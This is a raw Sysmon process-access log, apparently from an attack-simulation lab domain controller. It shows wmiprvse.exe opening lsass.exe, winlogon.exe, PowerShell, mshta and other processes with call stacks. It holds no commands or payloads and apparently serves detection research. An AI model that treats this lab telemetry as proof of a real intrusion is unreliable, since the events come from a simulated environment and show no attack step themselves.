15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 